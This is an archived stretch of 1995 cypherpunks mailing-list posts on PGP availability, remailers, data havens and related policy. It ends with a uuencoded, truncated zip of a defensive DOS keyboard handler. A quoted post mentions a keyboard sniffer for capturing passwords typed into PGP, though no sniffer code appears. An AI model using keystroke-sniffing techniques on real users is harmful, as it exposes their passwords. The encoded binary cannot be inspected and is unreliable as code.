   softdrink vending machines.  There was an article in The Dominion
   newspaper's _InfoTech_ magazine crying out for the Government to stop
   it, claiming Telecom's creating an independant (from the Reserve Bank)
   currency, will destroy the New Zealand economy, etc., etc.

Sounds like your basic central banking ignorance.

Look folks, just so y'all don't look like idiots, remember this: A
means of payment is not the same thing as a currency.

Eric




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ddt@lsd.com (Dave Del Torto)
Date: Fri, 13 Jan 95 10:24:16 PST
To: cypherpunks@toad.com
Subject: Re: Pgp where?
Message-ID: <ab3c722e200210036071@[192.187.167.52]>
MIME-Version: 1.0
Content-Type: text/plain


At 6:52 am 1/12/95, kevin.rock@njackn.com wrote:
>I think this is the correct board to put this message on, but since there are
>no messages to read here I might be wrong.  Does anyone know where to locate
>the program (algorithm) Pretty Good Protection (PGP) ?  I've read about it in
>the local newspaper, in Scientific American and in the alternate news message
>area.  It sounds like a good encryption scheme and I would like to explore
>>it's possibilities.  Thanks for any assistance.


Kevin,

FYI, I keep the most recent version of Mike Johnson's excellent guide on
where to find PGP in:

  ftp.netcom.com:/pub/dd/ddt/crypto/crypto_info/where_is_pgp?.txt

This is a plain text file, but (for Mac users) the file:

  ftp.netcom.com:/pub/dd/ddt/crypto/crypto_info/where_is_pgp?.txt.sea.bin

is a self-expanding Mac archive (faster transfer time). There're some other
informational files in that dir, and any cpunks who know of a
quintessential PGP info file is encouraged to let me know so I can post it
there. Remember, this "archive" is oriented toward new PGP users who need
friendly information on why/how/who/where/when etc.

If you're in the US or Canada, you can also find the most up-to-date
version of the MacPGP application in this directory:

  ftp.netcom.com:/pub/dd/ddt/crypto/NOT_FOR_EXPORT

Be sure to read the ReadMe files detailing the export restrictions, since
transfer of this software to a system or machine outside of the US or
Canada is strictly verboten.

Send email to <pgp-questions@lsd.com> if you have further questions.

   dave
______________________________________________
 "Civil Liberty Through Simple Cryptography."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Halvor Kise jr." <HALVORK@sofus.hiof.no>
Date: Fri, 13 Jan 95 01:46:23 PST
To: cypherpunks@toad.com
Subject: Re: Some PGP problems
Message-ID: <14DAA230C3F@sofus.hiof.no>
MIME-Version: 1.0
Content-Type: text/plain


Hello!

I have send an reply to C. Crunch.
I enclosed the "Where to get the latest PGP"-FAQ

- Halvor.


>Hi,
>
>I'm trying to decode a PGP file that was created with Ver 2.6.
>At this time,  I thought that my older ver 2.1c (Running on a
>Mac) would at least be able to decrypt something made from
>a higher version,  running on a PC.   Apparently that is not so.
>
>So,  the next thing I did,   or what any self respecting
>Cypherpunk might so,   is to go out on the net and look
>for a later version to FTP>   Well,   after discovering
>that soda.berkeley.edu don't exist anymore,  I eventually
>found the ftp site where it lives.  ftp.csua.berkeley.edu.
>
>I learn that Mac PGP2.3 exists,  but NO version 2.6
>exists for the Mac.   Is that true?    If not,  then
>where can I get a copy,  so I can decode a message
>created with 2.6?    If ver 2.3 will decode a message
>encoded with 2.6,  then I'm faced with how I can
>extract this Mac file which has a .gz extension.
>Binhex don't seem to decode it.  So,  I now got this
>file named "macpgp2.3.cpt.hqx.gz" on my Mac.    Was
>I supposed to have used some special UNIX itility to
>convert the .gz thingie first?    Please emlighten
>this confused cypherpunker!!! :-)   Or will I even have
>to do all of this because 2.3 is incompatable with 2.6.
>
>C. Crunch

--

                         * MEMENTO MORI *

        _____________________________________________________
        | Halvor Kise jr.     *  Halvor.Kise.jr@hiof.no     |
        |                     *  halvork@sofus.hiof.no      |
        |     Ostfold         *  halvork@frodo.hiof.no      |
        | Regional College    *        Student at           |
        |  N-1757 Halden      *     Computer Science        |
        |                     *                             |
        |                                                   |
        |         Finger halvork@sofus for PGP-key          |
        -----------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: chen@intuit.com (Mark Chen)
Date: Fri, 13 Jan 95 11:00:30 PST
To: cypherpunks@toad.com (cypherpunks)
Subject: Re: FBI and BLACKNET
In-Reply-To: <HeW5lKjqRyHD077yn@mirage.skypoint.com>
Message-ID: <9501131859.AA09568@doom>
MIME-Version: 1.0
Content-Type: text/plain



If anyone is interested, I have a complete "FOIA Kit," issued by the
Fund for Open Information and Accountability, Inc.  It includes
instructions, advice, and an assortment of sample letters.

E-mail me if you would like a copy.


--
Mark Chen 
chen@intuit.com
415/329-6913
finger for PGP public key
D4 99 54 2A 98 B1 48 0C  CF 95 A5 B0 6E E0 1E 1D



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: eric@remailer.net (Eric Hughes)
Date: Fri, 13 Jan 95 11:14:22 PST
To: cypherpunks@toad.com
Subject: Re: How do I know if its encrypted?
In-Reply-To: <N3V5lG9s1WC8075yn@wwa.com>
Message-ID: <199501131912.LAA02985@largo.remailer.net>
MIME-Version: 1.0
Content-Type: text/plain


   From: lce@wwa.com (Larry E)

   The goal is to convince the two groups of concerned parties[, in
   short, users & lawyers,] that the remailer operators don't know the
   contents of what's passing through their remailers:

This is exactly right.  With a sealed box which you can't look in at
all, this is easy.  Providing an assurance on a general purpose
computer is more difficult.  And yes, it _is_ always possible to
simulate a filter that's not a filter, blah, blah, blah.  We are in
the realm of social interactions here, not in the realm of technology.

   The remailers are operated by people who want to promote information
   flow, not restrict it.  They provide an important service that is of
   critical importance to some people and groups who use the net.  They
   shouldn't be held accountable for the few who abuse the remailers,
   and encryption helps prevent that from happening.

I agree with this argument.  It is the germ of discourse about the
public policy of remailers and anonymity generally.  I want to point
out the rhetorical content of this statement, though, more than my
agreement with it.

The cypherpunks list is filled with paranoid nay-sayers who can't
distinguish their own paranoia from a legitimate technological
failing.  I feel a dire need for a positive rhetoric of cryptography.
I want to be 'for' something and to know what it's good for rather
than to be against everything that doesn't meet my personal desires.

How many times have I seen particular solution whose response is "But
I want more, and this won't work for that"!  The most self-deceptive
say "It can't be done", the slightly more honest say "You can't do
it", and none say "I will not do it".  So now all you people who think
that remailers don't work, don't run one.  Good, I see most of you are
already complying with this directive.

Even the simplest remailer has utility.  If there were no utility,
then nobody would use them (duh).  It is not only foolishness and
idiocy but also mendaciousness to say that "remailers just don't
work".  It is constructive to say, however, that "the current
remailers don't work against the following opponent", but this is not
usually the case.  Rather, the speaker's paranoia silently projects
their own requirements onto a technical discussion, leaving only
confusion.

Look at the recent conversation over postage for remailers.
Paraphrasing: "Credit cards won't work because they're not anonymous".
My response: "Bullshit".  Using a credit card as a means of payment
does put constraints on usage, but it doesn't prevent usage (duh
redux).  What credit card payment does do is to require more effort in
order to link email transactions.  This is an unalloyed good, but pure
silver instead of gold.  There are better ways, one of them First
Virtual, which at the least has counterparty anonymity; another, blind
sigs (as yet unusable for payments).

The implicit assumption here is that "If I can't use it to smash the
state, it's worthless".  Well, thank you very much for constraining my
ability for privacy with your political agenda.  And I have a hint for
all the state-smashing wannabe-businesspeople out there: the ones who
have a business (less secure) now will eat your lunch for the business
(more secure) later.

To be dry and academic about this, I'd say that the problem was an
insufficiency in threat modelling.  But that just doesn't quite mean
the same thing, n'est ce pas?

Eric




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: eric@remailer.net (Eric Hughes)
Date: Fri, 13 Jan 95 11:17:44 PST
To: cypherpunks@toad.com
Subject: Re: time stamping service (again)
In-Reply-To: <m0rSZSa-0009v8C@sdwsys>
Message-ID: <199501131916.LAA02991@largo.remailer.net>
MIME-Version: 1.0
Content-Type: text/plain


   From: sdw@lig.net (Stephen D. Williams)

   It should have minimize bandwidth, minimize cpu, minimize storage
   levels of service to allow different levels of users to have
   different possible impact on the machine.  (Ie. : local, paying,
   regional, unknown, domain, etc.)

This is the area of policy, for which there are no general purpose
solutions that I know of.  I see a need for a general purpose module
that would accept authorization requests from various end-user
services (remailing, timestamping, storage, etc.) and return yes or
no.  If money is part of the policy, this is the place to implement
it.

That said, I don't think the lack of a policy engine prevents a
cypherware distribution from happening.

Eric




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: eric@remailer.net (Eric Hughes)
Date: Fri, 13 Jan 95 11:21:15 PST
To: cypherpunks@toad.com
Subject: Re: Data Havens..A consumer perspective
In-Reply-To: <Pine.3.89.9501130154.B28998-0100000@nesta.pr.mcs.net>
Message-ID: <199501131919.LAA02994@largo.remailer.net>
MIME-Version: 1.0
Content-Type: text/plain


   From: Nesta Stubbs <root@nesta.pr.mcs.net>

   are you saying that there is an agreement between the data haven operator 
   and the user?

There's always an agreement, implicit or explicit.

   Right now were are getting into so many fraggin different definitions of 
   data haven, that this conversation is loopng over itself infinetly.  

Well, the 'data haven' that started the topic of discussion was a
misnomer; it's really an off-site storage facility.  I don't know
about the rest of the list, but I'm more concerned with discussing
working code.

Eric




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Robert A. Hayden" <hayden@krypton.mankato.msus.edu>
Date: Fri, 13 Jan 95 09:31:26 PST
To: Cypherpunks Mailing List <cypherpunks@toad.com>
Subject: Dangerous Web Site
Message-ID: <Pine.ULT.3.91.950113112935.6321A-100000@krypton.mankato.msus.edu>
MIME-Version: 1.0
Content-Type: text/plain


I was net-surfing and I came across the following site:

	http://www.satelnet.org/

They do credit checks of any person, SS# ID's, national database 
searches, etc of any person or business (for a small fee).

Gee, don't I feel like little brother now.

____        Robert A. Hayden       <=> hayden@krypton.mankato.msus.edu
\  /__          -=-=-=-=-          <=>          -=-=-=-=-
 \/  /  Finger for Geek Code Info  <=>     I am Pentium of Borg
   \/   Finger for PGP Public Key  <=>   you will be approximated





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dmandl@bear.com
Date: Fri, 13 Jan 95 13:02:01 PST
To: cypherpunks@toad.com
Subject: Re: Remailer@jpunix.com down!!!???
Message-ID: <9501131702.AA06825@yeti.bsnet>
MIME-Version: 1.0
Content-Type: text/plain


> From: "Joshua M. Sled" <jsled@eis.calstate.edu>
> Subject: Re: Remailer@jpunix.com down!!!???
> 
> On Fri, 13 Jan 1995, Samuel Kaplin wrote:
> 
> > I just read that the remailer at jpunix.com went down suddenly and
> > permanently. Anyone know what happened?? I also believe the whole site is
> > down as it didn't answer my pings a couple of days ago.
> 
> He was getting spam from AOL at the rate of 25 messages every 5 
> seconds... so he took the system down.

I missed the specifics of this the first time.  How was the spammer doing
it?  Obviously he wasn't chaining his mail, or there'd be no way to know
he was from AOL.  Was JP unable to determine the guy's actual address?  Or
was he posting in the clear sans anonymity?

Sorry if this has been covered already.  I remember seeing the incident
mentioned, but I can't recall the explanation of why JP was powerless to
do anything about it.

Thanks.

   --Dave.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Andreas.Elbert@gmd.de (Andreas Elbert)
Date: Fri, 13 Jan 95 03:11:57 PST
To: cypherpunks@toad.com
Subject: Re: "safe" Internet access
Message-ID: <ab3c0afd00021004a7bf@[141.12.61.146]>
MIME-Version: 1.0
Content-Type: text/plain


sorry to correct you, but the 900 MHz licensefree radios, the cellular
radios (analog and digital) and Modacom and Mobitex are all different
animals.
i don't want to go into details though, because it doesn't change your main
point, the ability to localize one of these radios while transmitting.

Andreas






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Thomas Grant Edwards <tedwards@src.umd.edu>
Date: Fri, 13 Jan 95 09:17:11 PST
To: Andreas Elbert <Andreas.Elbert@gmd.de>
Subject: Re: "safe" Internet access
In-Reply-To: <ab3c0afd00021004a7bf@[141.12.61.146]>
Message-ID: <Pine.SUN.3.91.950113121410.26796A-100000@ether.src.umd.edu>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 13 Jan 1995, Andreas Elbert wrote:

> sorry to correct you, but the 900 MHz licensefree radios, the cellular
> radios (analog and digital) and Modacom and Mobitex are all different
> animals.
> i don't want to go into details though, because it doesn't change your main
> point, the ability to localize one of these radios while transmitting.

However, if there are a large number of 900 MHz radio modems operating in 
a cryptographically secure spread-spectrum method, it may be very 
difficult to locate your particular transmitter...however the modem you 
are talking to will know your pseudonoise sequence, and a receiver that 
knows this will have a much easier time tracking you down.

-Thomas





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ben.Goren@asu.edu
Date: Fri, 13 Jan 95 11:27:56 PST
To: cypherpunks@toad.com
Subject: Re: How do I know if its encrypted?
Message-ID: <v02110104ab3c75c9a6c6@[129.219.97.131]>
MIME-Version: 1.0
Content-Type: text/plain


At 10:52 AM 1/13/95, Eric Hughes wrote:
>   From: Ben.Goren@asu.edu
>
>   Here's a solution:
>
>What problem, pray tell, does this solve?

That of the data haven operator being able to deny knowledge of the
contents of files people send him. He'll only return files that, when
operated on by a strong cryptographic algorithm, make sense. He therefore
can't look inside the files until the owner asks for them back. If he
operates a timely (and automated) service, he can't know the contents until
after he's already sent the file back. If the server automatically deletes
the file upon return, he can't even tell what's in it then.

Further, an "authority" won't gain anything by seizing the data.

>It seems far more
>complicated than it need be.

As best I can tell, none of the previous suggestions guarantees that the
file is unreadable. How would you accomplish that in a simpler manner? Or
would you, as the operator of a data haven, not mind the risk of somebody
designing an illegal file that passes all your filters and tipping off the
police that you've got such a file on your computer, available to all--for
sale, even?

If there were a weakness in your filter, somebody could easily exploit that
weakness and get the use of your haven. With my system, they could send you
anything they liked, but it'd be little more than a cash donation, as
they'd never get it back. Your liability would be the same as if the person
had just emailed you the file and blew the whistle.

>   Alice sends a file to Dave's DataHaven. When Alice wants her file back, she
>   sends to Dave a secure hash of the file, a key with which to decrypt it,
>   and a handful of plaintext at the beginning of the file. Dave decrypts the
>   file that matches the hash with the key Alice gave him; if the file begins
>   as Alice says it should, Dave returns the file to Alice.
>
>Eric

b&

--
Ben.Goren@asu.edu, Arizona State University School of Music
 Finger ben@tux.music.asu.edu for PGP public key ID 0xCFF23BD5.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: an158409@anon.penet.fi (beacher)
Date: Fri, 13 Jan 95 06:12:50 PST
To: cypherpunks@toad.com
Subject: telecommunications reform again
Message-ID: <9501131259.AA05870@anon.penet.fi>
MIME-Version: 1.0
Content-Type: text/plain



Telecom Legislative Effort Opens
WASHINGTON, D.C., U.S.A., 1995 JAN 12 (NB) -- The Herculean task rewriting
the nation's telecommunications law, an effort that failed in the 103rd
Congress, has begun in Washington.

The Senate Commerce Committee opened the action this week with a hearing on
general concepts of communications reform. The last time Congress
successfully addressed the communications needs of the nation was 50 years
ago, with the 1934 Communications Act.

The new Republican Congress is expected to support deregulation and
competition in the provision of telecommunications services. But so do most
Democrats, and the devil will be in the legislative details, as the various
forces in the marketplace seek to use legislative language to secure
competitive advantages.

Sen. Larry Pressler (R-SD), chairman of the committee, predicted that his
panel will report a bill by July 4. Rep. Jack Fields (R-Texas), who heads the
House telecommunications subcommittee, said his group will approve a bill by
Easter.

But neither legislator has yet to introduce a bill, so experts are unable to
predict where the inevitable fights will occur and on whose turf.

"Let's pick a starting date -- January 1, 1996 or 1997 -- and say,
'Gentleman, start your engines. We're going to have a race and let the best
man win,'" said Sen. Bob Packwood (R-Ore.) at the hearing.

As the opening bell was ringing in the Senate, Vice President Al Gore was
trying to gin up support for the administration's views on telecommunications
at a meeting of state regulators and local government officials.

"Competition in the information marketplace will provide Americans with lower
prices for their telephones, cable and information goods and services and
give them more and better choices," Gore said. The White House estimates that
competition in telecommunications will also create 1.4 million new jobs over
the next 10 years.

The contending forces were also getting organized. The seven regional Bell
operating companies announced that Gary McBee, former chairman of the United
States Telephone Association, will head their lobbying efforts in the new
Congress. The Baby Bells support opening all markets to immediate
competition.

"It's time to open all markets to all competitors, under the same conditions
and at the same time," McBee said. "That will mean lower prices, more choices
and better service for everyone." McBee's coalition will be called the
Alliance for Competitive Communications.

(Kennedy Maize/19950111/Press Contact: Bill McCloskey, ACA, 202-463-4129)


-------------------------------------------------------------------------
To find out more about the anon service, send mail to help@anon.penet.fi.
Due to the double-blind, any mail replies to this message will be anonymized,
and an anonymous id will be allocated automatically. You have been warned.
Please report any problems, inappropriate use etc. to admin@anon.penet.fi.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Robert A. Hayden" <hayden@krypton.mankato.msus.edu>
Date: Fri, 13 Jan 95 11:24:37 PST
Subject: Amusing thing that might interest
Message-ID: <Pine.ULT.3.91.950113132211.13038B-100000@krypton.mankato.msus.edu>
MIME-Version: 1.0
Content-Type: text/plain


I thought that this might amuse:

--------------------
Newsgroups: rec.humor.funny
From: scotta@kije.gsfc.nasa.gov (Scott Austin)
Subject: Information Superhighway: The Real Scoop

As seen in "Abort, Retry, Fail?", by Don Willmont, from the July '94 PC 
Magazine.

-------------------------
Renaming the Info Highway
-------------------------

We asked you to help us rename the Information Highway, and boy, did you ever!

[runner-up info deleted]

The winner is Kevin Kwaku, who suggested that while the Information 
Superhighway is a bad name, it could be a great acronym, standing for 

"Interactive Network For Organizing, Retrieving, Manipulating, Accessing, 
 And Transferring Information On National Systems, Unleasing Practically
 Every Rebellious Human Intelligence, Gratifying Hackers, Wiseacres, And
 Yahoos."


Scott Austin
scott_austin@cnt.com
--
Selected by Maddi Hausmann Sojourner.  MAIL your joke to funny@clarinet.com.
Attribute the joke's source if at all possible.  A Daemon will auto-reply.

Remember: Always give your jokes a descriptive "Subject:" line.
Don't use "joke" or "submission" or "joke submission," please.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Rothenberg <rrothenb@libws4.ic.sunysb.edu>
Date: Fri, 13 Jan 95 12:34:44 PST
To: cypherpunks@toad.com
Subject: Re: Keyboard sniffing in DOS
Message-ID: <9501132033.AA17462@toad.com>
MIME-Version: 1.0
Content-Type: text


 <m00012@kanga.stcloud.msus.edu> wrote:

: For Dos operating systems.

  [..]

: But, here it is, the source code for a keyboard sniffer program.

  [..]

: Then, test it out with pgp or other dos based programs that ask
: you for a password (use a fake one), and you will probably see
: how insecure most of these programs are.

: Mike

I've thought about that problem too for terminal as well as crypto,
(after seeing an article in 2600 about sniffing a roommate's passwords
to the "K00L EL1T3 B0ARDZ") and started on a small "secure" keyboard
handler.

Here it is, though in very incomplete form.  It ignores Pause, Cntl-
Break and PrintScreen and doesn't make an annoying noise when the 
buffer is full, and may not work entirely for enhanced keyboards (since
I do not own one to test it on). There's plenty of room for improvement
in this, I'm sure...

It does have some features like random-noise sampling, "SuperKey" codes
and multiple keypress maps (as well as an option to hook into Interrupt
0x16 if security isn't a pariority).

The interface is in Turbo Pascal because I haven't made the migration
to C yet (don't flame).  Any help with fix-ups, improvements a C-
interface and constructive suggestions would be appreciated.

I've tested it with KeyTrap and it *seems* safe from such monitoring
trojans.... 

  Rob <rrothenb@ic.sunysb.edu> PGP Key ID = 0xab1f4831

begin 644 kbisr132.zip
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
